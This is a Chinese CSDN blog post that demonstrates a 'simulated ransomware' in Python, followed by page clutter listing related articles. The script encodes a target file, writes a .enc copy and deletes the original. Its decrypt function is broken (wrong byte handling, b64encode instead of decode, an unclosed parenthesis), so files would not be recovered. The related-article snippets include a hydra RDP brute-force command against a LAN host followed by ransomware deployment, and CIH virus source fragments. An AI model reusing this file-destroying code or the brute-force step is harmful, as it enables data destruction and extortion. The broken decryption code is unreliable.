【安全脚本】模拟勒索病毒

最新推荐文章于 2024-04-09 04:39:23 发布
最新推荐文章于 2024-04-09 04:39:23 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: 安全学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoaaao/article/details/127098947
版权

0x00 前置

1、将电脑上的重要文件加密,将文件以二进制的方式进行加密处理,导致加密过后的文件,要打开必须要解密,要解密必须要解密程序。

2、传播:系统or程序漏洞、人为疏忽、后门或木马程序。

3、解决:交钱、破解、数据备份

0x01 python模拟原理

1、如何使用python对文件加密

所有文件都可以base64加密,base64是标准字符串,针对字符串进行加密。再保存,此时将无法打开文件。如果解密,将加密后的文件,按字符串进行解密,并重新保存为二进制文件。

 2、过程

(1)对二进制文件进行base64转码并加密保存

(2)定义加密算法并将加密后的字符串保存在文件中

(3)代码

##对二进制文件进行base64转码并加密保存
import base64 ,os

#加密
def encrypt(filepath):
    with open(filepath, mode='rb') as file:
        data = file.read()

    source = base64.b64encode(data).decode()
    print(source)
    #加密算法:大小写字符右移5位
    dest = ''
    for c in source:
        dest+= chr(ord(c)+5)

    #将加密字符串保存在文件中
    with open(filepath + '.enc', mode='w') as file:
        file.write(dest)
    #删除原始文件
    os.remove(filepath)

#解密
def decrypt(filepath):
    with open(filepath, mode='rb') as file:
        content = file.read()

    dest = ''
    for c in content:
         dest += chr(ord(c)-5)

    newfile = filepath.replace('.enc', '')

    with open(newfile, mode='wb') as file:  #将加密文件以二进制方式取回
        file.write(base64.b64encode(dest)

if __name__ =='__main__':
    encrypt('./test.jpg')

(3)结果

加密后的文件

 生成的勒索文件:

//很显然勒索病毒的原理和实现都很简单,其实就是把别人的文件加一个只有你自己知道的密码,然后要钱。里面的加密算法、文件随意变换。

haoaaao
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
php病毒源代码,病毒程序源码实例剖析-CIH病毒[2]
weixin_33335851的博客
03-19 1029
病毒程序源码实例剖析-CIH病毒[2]OriginalAppEXE SEGMENT;PE格式可执行文件文件头FileHeader:db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000hdb 0b8h, 000h, 000h, 000h, 000h, 000h...
Centos安全核查工具脚本
03-24
Centos安全核查工具脚本
2023年网络安全应急演练脚本
01-26
2023年网络安全应急演练脚本,本脚本从演练开场、演练开始、总结汇报和演练结束四个步骤,分步骤指导参与演练的小组成员、应急演练小组、演练总指挥、演练小组组长等成员的角色,提供每个阶段演练的剧本和对应的内容,可直接复用到实际的应急演练活动中。 该脚本文档内还提供领导讲话内容及具体的动作和场景部署,各个角色的台词和职责均区分,便于直接使用。
Python-一份勒索病毒解密工具的整理汇总
08-10
一份勒索病毒解密工具的整理汇总
简单的弹窗病毒编程代码,python无限弹窗代码
yang0728y的博客
03-19 784
别把第29行代码""for i in range()''''中''''range()''''括号里的数调的太大,你给里面写的是几,弹窗就出现几个,最好不要破1000,要不然运行完以后windows会出现一个进度条然后就——直接强制关机;我们通常在看电视剧时会看见一些非常牛逼的骇客,非常容易的黑入人家电脑,并悄无声息的植入病毒,在你不知道的情况下窃取你的隐私;我们可以羡慕他们的技术,但我们不能做一名挑战网络安全,扰乱网络秩序的人,但——不能霍霍别人电脑,不代表不可以霍霍自己电脑啊(。・∀・)ノ゙。
Python实现简易勒索病毒
m0_56375711的博客
03-06 5092
python实现简易的勒索病毒(使用非对称加密算法RSA)
勒索病毒应急演练
shy的博客
01-19 3440
扫描目标机开放端口,发现开启445和3389端口。 测试445端口是否存在永恒之蓝漏洞,发现存在ms17010漏洞,日后再打。 测试3389远程桌面是否存在弱口令,得到账号密码。 hydra -v -f -t 2 -w 2 -l Administrator -P E:\tools\git\Rdpscan\pass.txt rdp://192.168.5.128 利用得到的账号密码远程进行登录,并进行勒索病毒投放。 双击运行病毒,对该台服务器进行文件加密、勒索等操作。 攻击者到
使用【Python】快速生成本项目的requeirments.txt
宁静与致远的博客
03-11 9373
在Python项目中,我们通常需要使用许多第三方库来提供额外的功能和工具。但是,直接将这些库上传到Git仓库并不是一种好的做法,因为这会使得代码库变得过于臃肿,并且很难管理。此外,有时候在部署应用程序时也需要安装特定版本的依赖项。这时候,就可以使用requirements.txt文件来管理项目所需的依赖项。该文件列出了项目所需的所有依赖项及其版本号,使得其他人可以轻松地安装和运行该项目所需的所有依赖项。使用pip命令读取该文件,可以自动下载并安装所有列出的依赖项,这大大简化了项目启动/部署的流程。
勒索病毒用什么语言写,勒索病毒代码python
weixin_61088415的博客
02-28 328
本篇文章给大家谈谈python写勒索病毒都需要什么工具和材料,以及python写勒索病毒都需要什么工具和设备,希望对各位有所帮助,不要忘了收藏本站喔。Source code download: 本文相关源码 加密函数为,如果需要解密,将改为即可。
【Python】勒索病毒模拟
BrosyveryOK的博客
10-18 2151
勒索病毒能将电脑上的一些重要文件进行数据加密,将文件以二进制的形式进行加密处理,导致无法成功打开加密后的文件,要打开必须要解密,要解密必须要解密程序,从而让我们能够进行勒索。​ 勒索病毒的原理不难,简单来说就是对数据的加密,而解密的办法一般只有我们自己知道,接下去就让我们来编写一些简单的勒索病毒吧!​ 勒索病毒更多情况下是.exe的可执行文件,一般情况下都是由编译型语言编写后编译形成。
依据病毒MD5排查病毒文件--python、pyinstaller、exe_态势感知md5文件
最新发布
m0_60608008的博客
04-09 851
先进行python的安装,然后安装python库pyinstaller。后面进行py脚本的编写,最后将py脚本转为exe格式的应用程序,方便在windows终端上运行查找病毒文件病毒文件的md5放在md5v.ini文件中。
勒索病毒禁用相关端口批处理,政企用
03-25
勒索病毒禁用相关端口批处理 IP安全策略禁用端口 防火墙禁用端口 135/137/138/139、远程桌面、文件和打印机共享 里面都有注释,自行参考运行,不需要的可删除再运行。 关闭相关端口、文件和打印机共享,会导致...
计算机信息安全脚本病毒实验
12-31
有关计算机脚本病毒实验报告,希望可以帮助大家吧,
网络安全脚本-ftp.py
04-13
网络安全脚本-ftp.py
性能测试监控介绍及其数据分析
weixin_33979363的博客
01-28 1779
为什么80%的码农都做不了架构师?>>> ...
勒索病毒解密:了解最新变种DevicData-D-XXXXXXXX,以及如何保护您的数据
weixin_shujuxf的博客
12-27 851
这些勒索病毒往往攻击入侵的目标基本是Windows系统的服务器,包括一些市面上常见的业务应用软件,例如:金蝶软件数据库,用友软件数据库,管家婆软件数据库,速达软件数据库,科脉软件数据库,海典软件数据库,思迅软件数据库,OA软件数据库,ERP软件数据库,自建网站的数据库等,均是其攻击加密的常见目标文件,所以有以上这些业务应用软件的服务器更应该注意做好服务器安全加固及数据备份工作。社交工程定制:针对特定组织或个人,攻击者可能采用更巧妙的社交工程手段,制定更符合目标喜好或关注领域的诱饵,增加感染成功的概率。
Simpleperf介绍
tq08g2z的专栏
08-17 8524
什么是simpleperf Simpleperf是Android平台的一个本地层性能分析工具。它的命令行界面支持与linux-tools perf大致相同的选项,但是它还支持许多Android特有的改进。 Simpleperf是Android开源项目(AOSP)的一部分。其源代码 位于。其最新的文档 位于。Bugs 和 功能需求可以提交到 githb上。 Simpleperf是如何工作的 现代的C
python简单的病毒编程代码,如何用python做恶搞病毒
chatgpt002的博客
08-21 570
原文链接:https://blog.csdn.net/wsh13922389049/article/details/128730637。版权声明:本文为CSDN博主「帅气的马」的转载文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。相信各位好奇心重的朋友们,特别是接触过爬虫的朋友们都想试一试如何做一个爬虫,别急.现在教你!好啦.以上就是如何制作python病毒代码的教程啦!没错,最狠的.关机(当然,mac的朋友们高枕无忧)以上代码为我们做需要的库;#关机 + 命令提示符。
协议脚本模拟脚本的区别
06-02
协议脚本通常是基于接口文档、协议标准等规范编写的,主要用于测试系统对外接口的正确性、稳定性和安全性等。 2. 模拟脚本模拟脚本是一种基于场景的脚本,通常是由测试人员编写的脚本,用于模拟用户使用系统的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值